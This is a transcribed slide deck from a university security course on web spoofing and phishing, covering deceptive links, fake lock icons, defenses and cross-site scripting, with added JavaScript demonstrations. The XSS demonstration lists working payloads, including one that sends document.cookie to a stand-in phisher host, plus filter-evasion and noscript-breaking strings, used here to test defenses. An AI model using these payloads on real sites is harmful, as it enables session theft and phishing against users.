Web Spoofing - PowerPoint PPT Presentation

Slides: 23
Provided by: mikef69
Learn more at: http://www.cs.fsu.edu

1
Web Spoofing
Steve Newell, Mike Falcon
Computer Security, CIS 4360
2
Web Spoofing
Introduction
  • Phishing is a form of identity theft in which
    deception is used to trick a user into revealing
    confidential information that has economic value.

3
Web Spoofing
Introduction
  • Definition: website spoofing is the act of creating
    a website, as a hoax, with the intention of
    misleading readers into believing that the website
    was created by a different person or organization.
  • Web spoofing is the web-site half of a phishing
    scheme: the forged message brings the victim to the
    spoofed site, and the site collects the data.

4
Web Spoofing
Statistic
  • The Gartner group estimates the direct
    phishing-related loss to US banks and credit card
    issuers in the last year to be $1.2 billion.
  • Indirect losses are much higher, including
    customer service expenses and account replacement
    costs.

5
Web Spoofing
Chart
6
Web Spoofing
Phishing Technologies
  • The goal of phishing is to deceive in one or more
    of the following ways:
  • Deceiving a user into believing a message comes
    from a trusted source.
  • Deceiving a user into believing that a web site
    belongs to a trusted institution.
  • Deceiving a spam filter into classifying a phishing
    e-mail as legitimate.

7
Web Spoofing
Deception
  • Deceptive return address information
    - Attempts to appear as a trusted source
  • Fraudulent request for action
    - Prompts the user to provide information
  • Deceptive appearance
    - Mimics the visual look of the target site

8
Web Spoofing
Deceptive Links
  • Misleadingly named: a link whose text reads
    http://security.commerceflow.com actually leads to
    http://phisher.com
  • Redirected: if the targeted company has an open
    redirect, it can be used to bounce a legitimate
    URL to a phishing site, so the link the user
    inspects really does begin with the trusted domain.

9
Web Spoofing
Deceptive Links
  • Obfuscated: using encoded characters to hide the
    destination address of a link. For example, abc
    can be written as the HTML character references
    &#97;&#98;&#99;
  • Programmatically obscured: using a scripting
    language such as JavaScript to hide the
    destination of a link. For example, a mouse-over
    handler can show a trusted address in the status
    bar while the link itself points elsewhere.
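As an added example (not part of the original slides), the following JavaScript link inspector applies the checks from slides 8 and 9, and the "show the user the actual link" defense from slide 14, to a link before it is followed: it decodes HTML character references, parses the real destination, flags anchor text that names a different site, catches the user-info trick (http://trusted@phisher.com, one way a "misleadingly named" link is built), and spots an open-redirect parameter carrying another site's URL. The host names commerceflow.com and phisher.com are the slides' placeholders; the function names and the two-label site comparison are this example's own simplifications.

```javascript
// Added example, not code from the slides. Runs under Node.js (URL is global).

// Decode HTML numeric character references such as &#97; (decimal) and
// &#x61; (hex), which a phisher uses to hide the real destination in an href.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
}

// Returns a URL object, or null when the text is not an absolute URL.
function parseUrl(s) {
  try { return new URL(s); } catch (e) { return null; }
}

// Compare hosts by their last two labels (assumption: a simplification of the
// public suffix list, good enough for the placeholder domains used here).
function sameSite(a, b) {
  const tail = (h) => h.toLowerCase().split(".").slice(-2).join(".");
  return tail(a) === tail(b);
}

// Inspect one link: the text the user sees (anchorText) and the real href.
function inspectLink(anchorText, href) {
  const warnings = [];
  const decoded = decodeEntities(href);
  const target = parseUrl(decoded);
  if (!target) return { displayedHost: null, actualHost: null, redirectsTo: null, warnings: ["unparseable href"] };

  const actualHost = target.hostname;

  // Anchor text that looks like a URL but names a different site.
  const shown = parseUrl(anchorText.trim());
  const displayedHost = shown ? shown.hostname : null;
  if (displayedHost && !sameSite(displayedHost, actualHost)) {
    warnings.push(`text shows ${displayedHost} but link goes to ${actualHost}`);
  }

  // Userinfo trick: http://security.commerceflow.com@phisher.com/ parses so
  // that the trusted name is a username and phisher.com is the real host.
  if (target.username) {
    warnings.push(`userinfo "${target.username}" precedes real host ${actualHost}`);
  }

  // Entity-encoded href: the raw attribute differs from what the browser sees.
  if (decoded !== href) {
    warnings.push("href contains encoded characters");
  }

  // Open redirect: a query parameter carrying an absolute URL to another site.
  let redirectsTo = null;
  for (const [, value] of target.searchParams) {
    const inner = parseUrl(value);
    if (inner && /^https?:$/.test(inner.protocol) && !sameSite(inner.hostname, actualHost)) {
      redirectsTo = inner.hostname;
      warnings.push(`redirect parameter leads to ${redirectsTo}`);
    }
  }

  return { displayedHost, actualHost, redirectsTo, warnings };
}

// Constructed sample links, one per technique on the slides.
const SAMPLE_LINKS = [
  ["http://security.commerceflow.com", "http://phisher.com/login"],
  ["abc", "http://&#112;&#104;&#105;&#115;&#104;&#101;&#114;.com/"],
  ["https://www.commerceflow.com", "https://www.commerceflow.com/redirect?url=http://phisher.com/x"],
  ["http://security.commerceflow.com", "http://security.commerceflow.com@phisher.com/"],
];

for (const [text, href] of SAMPLE_LINKS) {
  const r = inspectLink(text, href);
  console.log(`${href}\n  -> really ${r.actualHost}; ${r.warnings.join("; ") || "no warnings"}`);
}
```

A browser decodes the character references in an href attribute before navigating, which is why the inspector decodes first and only then parses; the "encoded characters" warning is worth raising on its own because a legitimate site has no reason to write its own address that way.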

10
Web Spoofing
Deceptive Location
  • It is not possible to determine whether a
    connection to a site is secure by looking at a
    lock icon in a browser
  • A lock icon by itself means only that the browser
    accepted a certificate for the host name in the
    address bar; it says nothing about who runs that host
  • It is possible to get a browser to display a lock
    icon using a self-signed certificate (after the
    user accepts the certificate warning)
  • A lock icon may be overlaid on top of the browser
    using the same technologies used to fake the URL
    bar

11
Web Spoofing
Information Flow Model
12
Web Spoofing
Information Flow Model
  1. A deceptive message is sent from the phisher to
    the user.
  2. A user provides confidential information to a
    phishing server (normally after some interaction
    with the server).
  3. The phisher obtains the confidential information
    from the server.
  4. The confidential information is used to
    impersonate the user.
  5. The phisher obtains illicit monetary gain.

13
Web Spoofing
Prevention
  • Preventing phishing attacks
  • The average phishing site stays active no more
    than 54 hours, so a defense has to act quickly
  • Pre-emptive domain registration: the institution
    registers look-alike domains before a phisher can
  • Holding period for new domain registrations, so a
    freshly registered look-alike cannot be used at once
  • E-mail authentication could prevent forged or
    misleading e-mail return addresses.

14
Web Spoofing
Defenses
Defenses Against Early User Actions
  • Open information: allow different spam filters,
    e-mail clients, and browsers to exchange
    information about unsafe domains.
  • Warn the user: alert the user when they attempt
    to click on an obfuscated link. Show the user the
    actual link, whether the site is trusted or not,
    and ask whether they wish to continue.

15
Web Spoofing
Defenses
  • Disrupting data transmission
  • Monitor outgoing data: implement a browser
    toolbar that stores hashes of the user's secrets
    and checks whether confidential information is
    about to be sent to an unexpected site.
  • Blacklisting: block IP ranges of known phishing
    sites.
  • Encryption: encrypt sensitive information before
    transmission, so a phisher who intercepts it
    cannot read it.

16
Web Spoofing
Defenses
Advanced Authentication
  • Two-factor authentication: require proof of two
    out of three criteria (something you are, something
    you have, or something you know)
  • Requires some sort of hardware token or
    time-sensitive information, so a captured password
    alone is not enough to log in
  • Use a checksum to verify that the information
    came from the user's machine and not a phisher.


17
Web Spoofing
Cross-site Scripting
  • Cross-site scripting is inserting a malicious
    script into a page served by a trusted domain.
  • A phisher could insert a malicious script inside
    of an auction listing or a product review to attack
    the user.
  • The script would modify the host site so that the
    user believes he/she is interacting with the
    trusted site, while the data goes to the phisher.
  • It is difficult to write a sufficient filter to
    remove cross-site scripting. How do you know if a
    script is malicious?
  • Wrapping user-supplied content in a <noscript> tag
    has been suggested as a way to hinder cross-site
    scripting, but it does not hold: the attacker simply
    includes a closing </noscript> tag in the content.
    Encoding user-supplied content on output, so that
    the browser never parses it as markup, is the
    defense that works.
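As an added example (not code from the slides), the JavaScript below shows why "how do you know if a script is malicious?" has no good filter-based answer. It runs four textbook XSS payloads, plus one aimed at the <noscript> idea, through three defenses: a tag-stripping blacklist, the <noscript> wrapper, and HTML output encoding. containsActiveContent is a deliberately small stand-in for a browser's parser, sufficient for these payloads only; phisher.com is the slides' placeholder and the function names are this example's own.

```javascript
// Added example, not code from the slides. Runs under Node.js.

// Defense 1: blacklist filter that strips <script> tags.
function naiveFilter(input) {
  return input.replace(/<\/?script[^>]*>/gi, "");
}

// Defense 2: the slide's suggestion, wrap user content in <noscript>.
function wrapNoscript(input) {
  return "<noscript>" + input + "</noscript>";
}

// Defense 3: HTML output encoding. The browser shows the characters but
// never interprets them as tags or attributes.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Stand-in for the browser: with scripting enabled, <noscript> content is
// inert text, so those regions are dropped before looking for anything that
// would execute: a script tag, an on* event handler, or a javascript: URL.
// (Assumption: a simplification of real HTML parsing, enough for these inputs.)
function containsActiveContent(html) {
  const visible = html.replace(/<noscript>[\s\S]*?<\/noscript>/gi, "");
  return (
    /<script\b/i.test(visible) ||
    /<[a-z][^>]*\son\w+\s*=/i.test(visible) ||
    /<[a-z][^>]*\s(?:href|src)\s*=\s*["']?\s*javascript:/i.test(visible)
  );
}

// Constructed payloads, as they might appear in a product review.
const PAYLOADS = [
  '<script>document.location="http://phisher.com/?c="+document.cookie</script>',
  '<img src=x onerror="document.location=\'http://phisher.com/\'">',
  "<scr<script>ipt>alert(1)</scr<script>ipt>", // survives a single-pass strip
  '<a href="javascript:alert(document.cookie)">Great seller!</a>',
  "</noscript><script>alert(1)</script><noscript>", // closes the wrapper
];

// Returns, per payload, whether the defense left it inert.
function evaluate(defense) {
  return PAYLOADS.map((p) => ({ payload: p, blocked: !containsActiveContent(defense(p)) }));
}

for (const [name, fn] of [["naiveFilter", naiveFilter], ["wrapNoscript", wrapNoscript], ["escapeHtml", escapeHtml]]) {
  console.log(name, evaluate(fn).map((r) => (r.blocked ? "blocked" : "EXECUTES")).join(", "));
}
```

The blacklist stops only the payload it was written for, the wrapper stops everything except the one payload that closes it, and encoding stops all five without needing to decide whether any of them is "malicious"; that is the practical answer to the slide's question.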

18
Web Spoofing
Examples
  • Example 1: http://www.msfirefox.com/ and
    http://www.msfirefox.net/
  • Example 2: Florida Commerce Credit Union
  • Example 3: Thomas Scott's parody, unofficial site
    versus official site
19
Web Spoofing
Leading Nations
20
Web Spoofing
Conclusion
  • Current technology is unable to completely stop
    phishing and web spoofing.
  • Improvements in security technology can
    drastically reduce the amount of phishing schemes.

21
Web Spoofing
Videos
  • Documentary Footage
  • Identity theft victims
  • Don't let this happen to you.

22
Web Spoofing
  • ANY QUESTIONS?